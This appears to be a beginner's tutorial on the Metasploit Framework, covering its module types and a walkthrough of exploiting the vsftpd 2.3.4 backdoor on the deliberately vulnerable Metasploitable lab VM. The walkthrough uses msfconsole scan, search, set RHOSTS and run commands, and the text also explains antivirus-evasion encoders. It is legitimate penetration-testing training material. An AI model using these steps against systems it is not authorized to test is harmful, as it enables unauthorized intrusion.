Metasploit is a versatile exploitation framework used by both the penetration testers and hackers. Its versatility comes from the ability to cover most of the cyber-attack process from reconnaissance to post-exploitation. It comes with two versions, Metasploit Pro which has a GUI (commercial version) and Metasploit Framework which we are going to learn which works with CLI (free version).
Metasploit framework architecture
We assume that you use Kali Linux or have installed it in your system. When first starting the Metasploit from the taskbar, you could see what command is being executed by right clicking on it. Fundamentally, it will execute two commands, msfdb init which starts the postgresql database and msfconsole, which executes the main console where you will be interacted with along the way.
Metasploit database
As a crucial component of the Metasploit framework, the database offers a means of managing and retrieving data with greater efficiency. This feature includes the ability to import and export scan results, providing users with a more comprehensive vulnerability assessment.
Metasploit console
However, it is not mandatory to run the database. Otherwise, you can use the msfconsole directly. It may be helpful to run the help command to list all the available commands. Possibly, one of its most useful commands is the use command, which allows you to interact with different modules based on the specific task you want to perform. The use command is critical for navigating and selecting the appropriate modules for your objectives.
Another useful command is search command, which lets you explore all available exploits and features that Metasploit have. With this command, users can easily browse through the extensive library of modules and quickly find the ones that match the information gathered from the reconnaissance process.
Metasploit modules
In total, there are seven different modules for different purposes. The metasploit modules are located in /usr/share/metasploit-framework/modules. Here are the explanations of the modules and the categories of each one.
Exploit
Exploit tends to gain access to the target server through a reverse shell or meterpreter. Exploit modules are categorized by the target system including Android, Linux, Windows, Solaris, etc.
Payloads
Payloads contain the code, command, or anything that the exploit is trying to “plant” and run on the target machine in order to gain access to the target system. The examples for these are the code for loading malware and the backdoor, the command to gain a reverse shell, or a code that works as a proof of concept for a particular vulnerability.
If you access the directory location of the payloads module, you will see four subdirectories which work differently.
Adapters : An adapter should be able to wrap a single payload and then turn it into a different format. These adapters are designed to provide a layer of abstraction between Metasploit and the target system. An example of using an adapter in Metasploit is wrapping a payload inside a PowerShell adapter, which converts the payload into a PowerShell command that can be executed on the target system.
Singles : Single payloads in Metasploit are designed to perform specific tasks on their own without requiring any additional components to execute. An example of a single payload is one that adds a user and executes a certain application on the target system.
Stagers : Stagers are responsible to establish communication between the attacker and the target system. This is useful while working with “staged payload”. Staged payload is an initial payload that is used to deliver an even bigger payload by downloading the rest of it in a series of smaller pieces.
Stages : This is the payload downloaded by the stager.
Auxiliary
Auxiliary modules work as a supporting module including fuzzer, scanner, crawler, cracker etc. In the module directory, various tools are grouped based on their functions and the target system. Each has its own set of options that can be configured to customize its behavior.
Encoders
As the name suggests, the encoder is used for encoding the payload. Sometimes, it is required for the payload to be encoded into a particular format to bypass signature-based antivirus mechanisms. This mechanism works by comparing their database of known threats with the payload the attacker is trying to send and alert the user if it detects a match.
The encoder module in Metasploit follows the technique known as “shellcode obfuscation”. The idea behind it is that by altering the payload structures with encoding, it could avoid security system detection like the mechanism we mentioned earlier.
Evasion
While the encoder is responsible for encoding the payload, the evasion module is the module to generate a new payload designed specifically to evade detection by using various techniques.
NOPs
In computer science, NOP is short for no operation, which lets the CPU do nothing for the entire clock cycle. It is useful in buffer overflow attacks.
Post
Post-exploitation modules are used after a system has been successfully compromised to gather additional information, maintain persistence, and perform further attacks. These modules can provide the attacker with a wide range of functionality to explore and exploit the target system.By using these modules, an attacker can increase their control over the compromised system and potentially gain access to other systems or networks within the target organization.
Using Metasploit
Let’s continue the explanation with a step by step tutorial of how to use Metasploit. For this purpose we will use the Metasploitable as a target server. You can download it from here.
If you don’t know what it is, it’s basically a Linux virtual machine which was intentionally made vulnerable for practicing pentesting techniques. As this VM is highly vulnerable, be aware that use this VM in a trusted network only and avoid running it continuously as it can be the attack vector for adversaries to gain access into your network.
**Reconnaissance **
Before doing any exploitation, it is critical to do some information gathering from your target. To do this you should know the IP of the Metasploitable server by using the ifconfig command. For example, the IP of Metasploitable in my system is 192.168.122.108. This IP will be used for scanning the open port on the target.
Now you can switch to your attacking system and access Metasploit Framework by using the command msfconsole. In the console, scan your target with the following command.
msf6> nmap -sT -sV 192.168.122.108
You need to wait for a while as it will give you quite detailed information about the target. In this case, we need the -sV argument because the installed version of each port will be important to look for the suitable exploit later.
**Selecting exploit **
You will get a bunch of information but let’s focus only on port 21 on the following line.
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
Using the information we can search exploits based on the version, port or the corresponding protocol. Therefore, we can search right away with the search command.
msf6> search port:21 type:exploit
There will be several options to choose from. If you find it quite confusing, you can narrow down the options by supplying more detailed information like this.
msf6> search port:21 type:exploit description:”vsftpd 2.3.4”
Now, you have one result. You can also read more of the exploit by using the info command.
msf6> info 0
You can now interact with a module by name or index.
msf6> use 0
or
msf6> use exploit/unix/ftp/vsftpd_234_backdoor.
**Setting up options **
After executing the command it will change to the specific exploit.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
Different exploits will require different options such as target hosts and port. Therefore, we need to set it before executing the exploit. Before that, we need to know what the options it requires with the following command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
You can see that some parameters such as RHOSTS (target host) and RPORT (port) are required. So, we need to set these options.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.122.108
Since the target uses the default port, we don’t need to set it. So, only setting up the target host should be enough.
**Checking and running the exploit **
Before running the exploit, you can check whether the target is vulnerable or not. You can do this with the following command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > check
It seems like in our case, the module does not support the check command. However, it is okay and so you know that the command does exist. Finally, you can run the following command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
If you get the output “Exploit completed, but no session was created”. You need to execute the run command once again and now you get access to the target system.
**Conclusion **
Metasploit Framework can make it very easy for the attacker or the penetration tester to take advantage of the system vulnerability. However, if you are trying to use it on your own, it is always better to not rely much on this tool without having a comprehensive understanding of how an exploit or any other modules works.